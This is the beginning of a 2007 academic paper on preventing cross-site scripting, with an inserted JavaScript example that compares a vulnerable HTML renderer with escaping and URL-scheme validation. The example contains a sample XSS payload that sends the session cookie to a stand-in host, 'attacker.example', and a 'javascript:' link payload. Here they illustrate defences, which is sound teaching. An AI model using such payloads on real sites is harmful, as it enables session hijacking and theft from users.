Prevention of Cross-Site Scripting Attacks on Current Web Applications
Universitat Oberta de Catalunya, Rambla Poble Nou 156, 08018 Barcelona, Spain
Universitat Autònoma de Barcelona, Edifici Q, Campus de Bellaterra, 08193 Bellaterra, Spain
Abstract. Security is becoming one of the major concerns for web applications and other Internet-based services, which are becoming pervasive in all kinds of business models and organizations. Web applications must therefore include, in addition to the expected value offered to their users, reliable mechanisms to ensure their security. In this paper, we focus on the specific problem of preventing cross-site scripting attacks against web applications. We present a study of this kind of attack and survey current approaches for its prevention. The advantages and limitations of each proposal are discussed, and an alternative solution is introduced. Our proposal is based on the use of X.509 certificates, and of XACML for the expression of authorization policies. With our solution, the developers and/or administrators of a given web application can express its security requirements on the server side and require their proper enforcement on a compliant client. This strategy is seamlessly integrated into generic web applications by relying on SSL and secure redirect calls.

Keywords: Software Protection; Code Injection Attacks; Security Policies.
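The attack class the paper targets, as an added example that is not part of the original paper and does not reproduce its X.509/XACML mechanism: a comment renderer that interpolates untrusted input straight into HTML, beside a version that encodes the input for its output context. It also shows why encoding alone is not enough in a URL context, where a `javascript:` link carries no HTML metacharacters. All function names (`renderUnsafe`, `renderSafe`, `escapeHtml`, `safeHref`, `renderLink`) and the sample payloads are constructed for this illustration.

```javascript
// Added example, not from the paper. Demonstrates a cross-site scripting injection:
// untrusted input interpolated into HTML, and two context-aware defences.
// All function names and sample inputs are constructed for this illustration.

// Constructed attacker payload: exfiltrates the session cookie to a hypothetical host.
const UNTRUSTED_COMMENT =
  '<script>new Image().src="http://attacker.example/?c="+document.cookie</script>';

// Vulnerable renderer: untrusted text lands directly in an HTML text context.
function renderUnsafe(comment) {
  return '<div class="comment">' + comment + '</div>';
}

// Encode the five characters that can change meaning in HTML text and attribute contexts.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };

function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Hardened renderer: same markup, but the untrusted text is encoded for its context.
function renderSafe(comment) {
  return '<div class="comment">' + escapeHtml(comment) + '</div>';
}

// Encoding does not help in a URL context: "javascript:alert(1)" contains no HTML
// metacharacters, so an href must be validated by scheme before it is encoded.
// Design choice (assumption): only absolute http/https URLs are accepted; anything
// else, including relative paths, collapses to a harmless "#".
function safeHref(candidate) {
  let parsed;
  try {
    parsed = new URL(candidate);            // WHATWG URL parser; throws on non-absolute input
  } catch (e) {
    return '#';
  }
  if (parsed.protocol !== 'http:' && parsed.protocol !== 'https:') {
    return '#';
  }
  return escapeHtml(parsed.href);           // still encode for the attribute context
}

function renderLink(label, url) {
  return '<a href="' + safeHref(url) + '">' + escapeHtml(label) + '</a>';
}

// Crude detector used to compare the two renderers: does the output contain a script element?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Stand-alone demonstration.
console.log('unsafe :', renderUnsafe(UNTRUSTED_COMMENT));
console.log('safe   :', renderSafe(UNTRUSTED_COMMENT));
console.log('link   :', renderLink('profile', 'javascript:alert(document.cookie)'));
```

The scheme check uses the global `URL` class available in Node.js and browsers; the parser lowercases the scheme, so `JavaScript:` variants are rejected as well. The point of the two renderers is that the defence is a property of where the untrusted data is placed (text node, attribute, URL), which is why a single escaping routine cannot be applied blindly.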
1 Introduction

The use of the web paradigm is becoming an emerging strategy for application software companies [6]. It allows the design of pervasive applications which can potentially be used by thousands of customers from simple web clients. Moreover, new technologies for the improvement of web features (e.g., Ajax [7]) allow software engineers to conceive new tools which are no longer restricted to specific operating systems (such as web-based document processors [11], social network services [12], weblogs [41], etc.). However, the inclusion of effective security mechanisms in those web applications is an increasing concern [40]. Besides the expected value that the applications offer to their potential users, reliable mechanisms for the protection of the data and resources associated with the web application should also be offered. Existing approaches to secure traditional applications are not always sufficient when addressing the web paradigm, and often leave end users responsible for the protection of key aspects of a service. This situation must be avoided since, if not well managed, it could allow inappropriate uses of a web application and lead to a violation of its security requirements. We focus in this p

This work has been supported by funding from the Spanish Ministry of Science and Education, under the projects CONSOLIDER CSD2007-00004 “ARES” and TSI2006-03481.

R. Meersman and Z. Tari et al. (Eds.): OTM 2007, Part II, LNCS 4804, pp. 1770–1784, 2007. © Springer-Verlag Berlin Heidelberg 2007